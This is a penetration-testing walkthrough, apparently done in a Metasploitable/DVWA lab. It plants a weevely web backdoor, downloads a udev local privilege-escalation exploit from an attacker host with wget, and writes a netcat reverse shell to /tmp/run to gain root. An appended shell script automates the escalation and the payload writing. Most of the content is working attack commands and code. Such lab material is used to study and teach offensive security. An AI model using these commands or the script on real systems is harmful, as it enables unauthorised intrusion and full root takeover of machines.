root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /var/www/door.txt -p testing
Then, using the command execution vulnerability in DVWA, download the backdoor onto the target.
After that, use weevely to access the backdoor.
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://192.168.56.101/dvwa/door.php -p testing
Up to here we can see that we are only running as the www-data user, so to get root we need a local privilege escalation exploit.
Here I will exploit udev, the device manager for the Linux kernel. The vulnerable udevd runs as root and does not check that the netlink messages it receives actually come from the kernel, so a local user can make it run a program as root.
Search for udev on Exploit-DB.
Looking at the usage notes in the exploit source, we have to pass the PID of the udevd netlink socket as the argument; it is listed in /proc/net/netlink and is usually the udevd PID minus 1. The exploit then makes udevd execute /tmp/run as root.
Now copy the exploit to /var/www/ on our machine.
After that, download the exploit onto the target system:
[www-data@metasploitable /var/www/dvwa] wget http://192.168.56.1/8572.c
Then compile it. For the payload I will use a reverse shell via netcat, written to /tmp/run. Note that udevd execs this file directly rather than through a shell, so it should start with an interpreter line such as #!/bin/sh and have the execute bit set, or udevd will fail to run it.
[www-data@metasploitable /var/www/dvwa] gcc -o tes 8572.c
[www-data@metasploitable /var/www/dvwa] echo '/bin/netcat -e /bin/sh 192.168.56.1 1234' >> /tmp/run
We can see (for example with ps aux | grep udevd) that udevd is running as PID 2290 and as root.
Then run nc listening on port 1234 (on our BackTrack box):
root@bt:~# nc -lvp 1234
After that, execute the exploit by typing (on the target):
[www-data@metasploitable /var/www/dvwa] ./tes 2289 (2289 = udevd PID 2290 minus 1, the PID of its netlink socket)
A shell comes back to our listener, and running id in it shows that we are root.
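As an added example (not part of the original post), here is a small POSIX shell helper that automates the last steps above. It reads the udevd netlink socket's port id from /proc/net/netlink, which the exploit's usage comment names as the authoritative source rather than assuming "PID minus 1", writes /tmp/run as an executable script with an interpreter line, and launches the compiled exploit. The script name udev_pe.sh, the function names, the constructed sample netlink table and the attacker address 192.168.56.1:1234 are assumptions of this write-up, and the exploit is assumed to be compiled as ./tes as in the post.

```shell
#!/bin/sh
# Added helper for the udev privilege-escalation step (not from the original
# post). Finds the port id that 8572.c expects by reading /proc/net/netlink,
# writes the /tmp/run payload in a form udevd can actually exec, and runs the
# exploit. Assumptions: exploit compiled as ./tes, attacker listening with nc,
# classic /proc/net/netlink layout "sk Eth Pid Groups Rmem Wmem Dump Locks".

NETLINK_KOBJECT_UEVENT=15   # netlink family udevd listens on for uevents

# Print the port id (Pid column) of the first NETLINK_KOBJECT_UEVENT socket
# that is not the kernel's own (Pid 0). Takes the table text as $1 so a
# captured copy can be fed in; defaults to the live /proc/net/netlink.
udev_netlink_pid() {
    table=${1:-$(cat /proc/net/netlink)}
    printf '%s\n' "$table" |
        awk -v fam="$NETLINK_KOBJECT_UEVENT" \
            'NR > 1 && $2 == fam && $3 != 0 { print $3; exit }'
}

# Write the payload udevd will run as root. udevd runs REMOVE_CMD with execv,
# not through a shell, so the file needs an interpreter line and the exec bit.
write_payload() {
    path=$1; lhost=$2; lport=$3
    {
        printf '#!/bin/sh\n'
        printf '/bin/netcat -e /bin/sh %s %s\n' "$lhost" "$lport"
    } > "$path"
    chmod 755 "$path"
}

# Constructed sample of /proc/net/netlink from a box where udevd is PID 2290
# and its uevent socket carries port id 2289 (the numbers used in the post).
SAMPLE_NETLINK='sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
ffff81003f4e8000 0   0      00000000 0        0        00000000 2
ffff81003f4e8400 15  0      00000000 0        0        00000000 2
ffff81003f4e8800 15  2289   00000001 0        0        00000000 2
ffff81003f4e8c00 16  2290   00000000 0        0        00000000 2'

# Usage on the target, once 'nc -lvp 1234' is listening on the attacker box:
#   sh udev_pe.sh live 192.168.56.1 1234
# With no arguments the script only defines the functions above.
if [ "${1:-}" = "live" ]; then
    pid=$(udev_netlink_pid)
    [ -n "$pid" ] || { echo "no udevd uevent socket in /proc/net/netlink" >&2; exit 1; }
    write_payload /tmp/run "$2" "$3"
    echo "udevd netlink port id: $pid; running ./tes $pid"
    ./tes "$pid"
fi
```

Reading the port id from /proc/net/netlink instead of subtracting one from the udevd PID matters because the "minus 1" rule is only a common coincidence of how udevd daemonizes; the exploit checks the sender's port id against that socket, so a wrong number simply makes udevd ignore the forged message.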